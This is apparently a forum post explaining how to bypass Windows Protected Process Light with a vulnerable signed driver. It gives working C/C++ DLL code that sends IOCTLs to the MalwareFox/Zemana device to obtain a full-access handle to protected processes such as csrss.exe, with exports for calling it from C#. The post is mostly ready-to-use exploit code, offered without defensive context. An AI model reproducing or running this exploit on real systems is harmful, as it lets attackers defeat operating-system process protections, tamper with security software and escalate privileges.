
Bypass Windows PPL

Rake

As many of you know, there are several ways to bypass Windows Protected Process Light (PPL) and obtain a full-access handle to a protected process (for example csrss.exe).

Here is one small example. It relies on a vulnerable signed kernel driver ("bring your own vulnerable driver"); there are several such drivers around, for example from Razer and MalwareFox.

I found a good tutorial based on the MalwareFox driver.
MalwareFox is a free antivirus program that ships with a kernel driver. The code below talks to that driver through its device object `\\.\ZemanaAntiMalware`, so the driver has to be installed and running on the machine (installing a driver requires administrative rights); if the device cannot be opened, the code simply returns no handle.

I reworked the source a little so that the project builds as a DLL whose exported functions can be called from a C# project (e.g. via P/Invoke) to obtain a handle that the driver opens with full access to a process such as csrss.exe. Note that the driver, not the calling code, decides which access rights the returned handle carries, and that the caller owns that handle and is responsible for closing it.


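/*
 * IOCTL codes accepted by the ZemanaAntiMalware device, as used by the
 * original tutorial code. Their names describe how this file uses them
 * (first: sends the caller's own PID; second: sends a target PID and
 * receives a HANDLE) — the driver's own semantics are not documented here,
 * so confirm against the driver before relying on them.
 */
#define ZAM_IOCTL_REGISTER_CALLER 0x80002010
#define ZAM_IOCTL_OPEN_PROCESS    0x8000204C

/*
 * Ask the ZemanaAntiMalware driver for a handle to process `pid`.
 *
 * Two DeviceIoControl calls are made on \\.\ZemanaAntiMalware:
 *   1. ZAM_IOCTL_REGISTER_CALLER with our own PID as input. If this fails
 *      the function gives up (the tutorial treats it as a prerequisite).
 *   2. ZAM_IOCTL_OPEN_PROCESS with `pid` as input; the driver writes a
 *      HANDLE into the output buffer.
 *
 * Security notes: nothing here validates `pid` — the driver is used as a
 * confused deputy to hand out a handle the caller could not open itself
 * (that is the point of the demo). The access mask on the returned handle
 * is whatever the driver chose; the caller owns it and must CloseHandle it.
 *
 * Returns the handle the driver produced, or NULL if the device could not
 * be opened or either IOCTL failed. GetLastError() is preserved across the
 * CloseHandle on the device so the caller can still read the failure code.
 */
HANDLE MFAM_GH(DWORD pid) {
    HANDLE hDevice = CreateFile(L"\\\\.\\ZemanaAntiMalware",
                                GENERIC_READ | GENERIC_WRITE, 0, NULL,
                                OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hDevice == INVALID_HANDLE_VALUE)
        return NULL; /* driver not installed/running, or access denied */

    HANDLE hProcess = NULL;
    /* lpBytesReturned is documented as mandatory when lpOverlapped is NULL;
     * the original passed NULL for it. */
    DWORD bytesReturned = 0;
    DWORD ourPID = GetCurrentProcessId();

    BOOL ok = DeviceIoControl(hDevice, ZAM_IOCTL_REGISTER_CALLER,
                              &ourPID, sizeof(ourPID), NULL, 0,
                              &bytesReturned, NULL);
    if (ok) {
        ok = DeviceIoControl(hDevice, ZAM_IOCTL_OPEN_PROCESS,
                             &pid, sizeof(pid), &hProcess, sizeof(hProcess),
                             &bytesReturned, NULL);
        if (!ok)
            hProcess = NULL; /* never hand back a partially written value */
    }

    /* CloseHandle may clobber the thread's last-error value; keep the
     * IOCTL's code for the caller. */
    DWORD lastError = GetLastError();
    CloseHandle(hDevice);
    SetLastError(lastError);
    return hProcess;
}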

/* Handle most recently obtained by GiveH(); read back by _handleGet().
 * Zero-initialised (NULL) until GiveH has run. Not closed by this file —
 * whoever retrieves it owns it. */
HANDLE handle_htest2 = NULL;

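/*
 * Exported entry point: obtain, through the vulnerable driver, a handle to
 * process `prcid` and store it in the global `handle_htest2`, where the C#
 * side retrieves it with _handleGet().
 *
 * `csiid` (the csrss PID in the tutorial's usage) is kept for ABI
 * compatibility but is no longer acted on. The original opened it twice —
 * once with OpenProcess(PROCESS_ALL_ACCESS) and once via the driver — and
 * discarded both results without closing them, leaking two handles on every
 * call while the returned handle only ever referred to `prcid`.
 *
 * Caveats:
 *   - `handle_htest2` is overwritten without closing the previous value, so
 *     calling GiveH repeatedly leaks the earlier handle unless the caller
 *     already closed it. Ownership of the stored handle is with the caller.
 *   - The PID parameters are `int` for the C# signature; `prcid` is passed
 *     to the driver as a DWORD, so a negative value wraps to a large PID.
 *   - No validation of the target PID happens here; see MFAM_GH().
 */
extern "C" __declspec(dllexport) void GiveH(int csiid, int prcid)
{
    (void)csiid;
    handle_htest2 = MFAM_GH((DWORD)prcid);
}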

/*
 * Exported accessor for the handle stored by GiveH().
 *
 * The `handle_h` argument is ignored: the original overwrote it with the
 * global before returning, and since it is passed by value the caller never
 * observed that assignment. Returns NULL if GiveH has not been called or the
 * driver call failed. The caller owns the returned handle.
 *
 * Note: an identifier beginning with an underscore is reserved at global
 * scope in C/C++, but the name is part of the exported ABI and is kept.
 */
extern "C" __declspec(dllexport) HANDLE _handleGet(HANDLE handle_h)
{
    (void)handle_h;
    return handle_htest2;
}



Original Article by NachoModding
